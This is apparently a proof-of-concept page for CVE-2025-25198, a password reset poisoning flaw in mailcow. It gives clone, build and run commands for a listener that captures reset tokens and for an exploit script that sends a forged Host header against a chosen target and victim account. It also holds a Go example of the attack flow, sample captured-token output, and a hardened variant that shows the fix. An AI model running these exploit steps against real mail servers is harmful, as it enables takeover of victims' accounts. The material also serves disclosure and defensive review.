
CVE-2025-25198 PoC — mailcow: dockerized vulnerable to password reset poisoning

Associated Vulnerability
Title: mailcow: dockerized vulnerable to password reset poisoning (CVE-2025-25198)
Description: mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the HTTP `Host` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link. Version 2025-01a contains a patch. As a workaround, deactivate the password reset functionality by clearing `Notification email sender` and `Notification email subject` under System -> Configuration -> Options -> Password Settings.
Description
Captures password reset tokens from Mailcow Host header injection attacks. 
Readme
# CVE-2025-25198

mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the HTTP `Host` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link.

## How it works
The server script starts an HTTPS listener that logs every request it receives. The exploit script then sends a POST request to the target's password reset endpoint with the `Host` header set to your chosen `<ip>:<port>`. mailcow builds the reset link from that header, so the reset e-mail delivered to the victim points at your listener, and when the victim opens the link the reset token arrives in the listener's output. You can also send the request from Burp Suite with an edited `Host` header and collect the token on the same listener.

## Features

- HTTPS server that receives the password reset token
- Exploit script that triggers the vulnerable reset request
- Everything fixed; openssl is no longer required

## Prerequisites

- Go 1.16 or higher

## Server Script

```bash
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
# root is not needed to build; it is only needed at run time if the listener binds a privileged port such as 443
sudo go build -o https-server server.go
./https-server
```

## Exploit Script
```bash
go mod init exploit
go mod tidy
# --base: target mailcow URL; --username: victim account; --host: your listener as <ip>:<port>, sent as the injected Host header
# --insecure is optional
sudo go run exploit.go --base <url> --username <user@email.com> --host <ip>:<port> [--insecure]
```

After a short wait, once the victim opens the poisoned link, the server prints the token you can use:
```
Redirecting to: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
```
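The mechanism described above, as an added example that is not code from the PoC repository or from mailcow: a mock reset endpoint that builds its link from the `Host` header (the bug class), the hardened variant that uses a configured hostname instead, the attacker's token-capturing listener, and the POST with a spoofed `Host` (`req.Host` in Go's `net/http`, which is what the PoC's `--host` flag or editing the header in Burp does). The `/reset-password` path, the `username` form field, `mail.example.com` and the reuse of the token from the sample output above as a fixed value are assumptions for the mock; the real mailcow endpoint and form fields are whatever `exploit.go` sends.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
	"sync"
)

// Assumptions for the mock: the real mailcow path and form field are whatever
// the PoC's exploit.go sends; the token is the one from the sample output above.
const (
	resetPath     = "/reset-password"
	usernameField = "username"
	demoToken     = "F53F8F-CC7A5B-E0CC4C-98680B-A72245"
)

// vulnerableResetLink reproduces the bug class: the link in the reset mail is
// built from the Host header, which the client controls (the mock is plain HTTP).
func vulnerableResetLink(r *http.Request, token string) string {
	return "http://" + r.Host + resetPath + "?token=" + token
}

// hardenedResetLink ignores Host and uses the operator-configured hostname, so
// a spoofed Host header cannot point the link at another domain.
func hardenedResetLink(configuredHost, token string) string {
	return "https://" + configuredHost + resetPath + "?token=" + token
}

// mockTarget stands in for the reset endpoint; the mail it would send is kept
// in outbox so the simulation can replay the victim clicking the link.
type mockTarget struct {
	hardened bool
	outbox   []string
}

func (m *mockTarget) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	link := vulnerableResetLink(r, demoToken)
	if m.hardened {
		link = hardenedResetLink("mail.example.com", demoToken)
	}
	m.outbox = append(m.outbox, link)
	fmt.Fprintf(w, "reset mail queued for %s\n", r.FormValue(usernameField))
}

// sendPoisonedReset posts the reset request with a spoofed Host header. In Go,
// req.Host is what goes on the wire as Host regardless of the URL dialled,
// which is what the PoC's --host flag (or editing the header in Burp) does.
func sendPoisonedReset(targetURL, username, attackerHost string) error {
	body := strings.NewReader(url.Values{usernameField: {username}}.Encode())
	req, err := http.NewRequest(http.MethodPost, targetURL+resetPath, body)
	if err != nil {
		return err
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	req.Host = attackerHost
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}
	return resp.Body.Close()
}

// runAttack returns the tokens the attacker's listener captured: one when the
// target builds links from Host, none when hardened. http.Get plays the victim's
// browser and only contacts the attacker; the configured hostname is off-line.
func runAttack(hardened bool) ([]string, error) {
	var mu sync.Mutex
	var captured []string
	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if t := r.URL.Query().Get("token"); t != "" { // victim followed the link
			mu.Lock()
			captured = append(captured, t)
			mu.Unlock()
		}
	}))
	defer attacker.Close()
	attackerHost := strings.TrimPrefix(attacker.URL, "http://")
	target := &mockTarget{hardened: hardened}
	site := httptest.NewServer(target)
	defer site.Close()
	if err := sendPoisonedReset(site.URL, "victim@example.com", attackerHost); err != nil {
		return nil, err
	}
	for _, link := range target.outbox {
		if strings.HasPrefix(link, "http://"+attackerHost+"/") {
			if resp, err := http.Get(link); err == nil {
				resp.Body.Close()
			}
		}
	}
	mu.Lock()
	defer mu.Unlock()
	return captured, nil
}

func main() { fmt.Println(runAttack(false)) }
```

`go run` prints the token list captured from the vulnerable target; `runAttack(true)` returns no tokens because the hardened link points at the configured host, which the victim's browser (played by `http.Get`) never contacts here. The hardened variant is the check to apply when reviewing any reset or verification mail flow: the host in the link must come from configuration, never from the request.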

